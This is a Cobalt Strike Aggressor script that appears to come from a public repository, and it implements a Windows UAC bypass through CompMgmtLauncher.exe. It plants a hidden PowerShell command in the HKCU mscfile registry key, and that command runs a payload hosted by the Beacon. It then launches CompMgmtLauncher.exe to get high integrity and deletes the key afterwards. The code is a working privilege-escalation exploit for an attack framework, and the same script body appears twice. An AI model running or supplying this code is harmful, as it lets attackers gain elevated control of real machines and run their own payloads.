001SPARTaN/CompMgmtLauncher.cna

## CompMgmtLauncher.cna
# CompMgmtLauncher.exe UAC bypass from http://x42.obscurechannel.com/?p=368

sub compMgmtLauncher_exploit {
    btask($1, "Task Beacon to run " . listener_describe($2) . " in a high-integrity context.");

    $script = artifact($2, "powershell");

    $oneliner = beacon_host_script($1, $script);
    $oneliner = strrep($oneliner, "IEX ", "");

    $cmd = "reg add HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command /d \"";
    $cmd .= "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden iex -c " . $oneliner . "\" /f";

    bshell($1, $cmd);

    bcd($1, "C:\\Windows\\System32");

    bpowerpick($1, ".\\CompMgmtLauncher.exe");

    bshell($1, "reg delete HKEY_CURRENT_USER\\Software\\Classes\\mscfile /f");
}

beacon_exploit_register("compmgmt", "CompMgmtLauncher UAC bypass", &compMgmtLauncher_exploit);
	# CompMgmtLauncher.exe UAC bypass from http://x42.obscurechannel.com/?p=368

	sub compMgmtLauncher_exploit {
	btask($1, "Task Beacon to run " . listener_describe($2) . " in a high-integrity context.");

	$script = artifact($2, "powershell");

	$oneliner = beacon_host_script($1, $script);
	$oneliner = strrep($oneliner, "IEX ", "");

	$cmd = "reg add HKEY_CURRENT_USER\\Software\\Classes\\mscfile\\shell\\open\\command /d \"";
	$cmd .= "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden iex -c " . $oneliner . "\" /f";

	bshell($1, $cmd);

	bcd($1, "C:\\Windows\\System32");

	bpowerpick($1, ".\\CompMgmtLauncher.exe");

	bshell($1, "reg delete HKEY_CURRENT_USER\\Software\\Classes\\mscfile /f");
	}

	beacon_exploit_register("compmgmt", "CompMgmtLauncher UAC bypass", &compMgmtLauncher_exploit);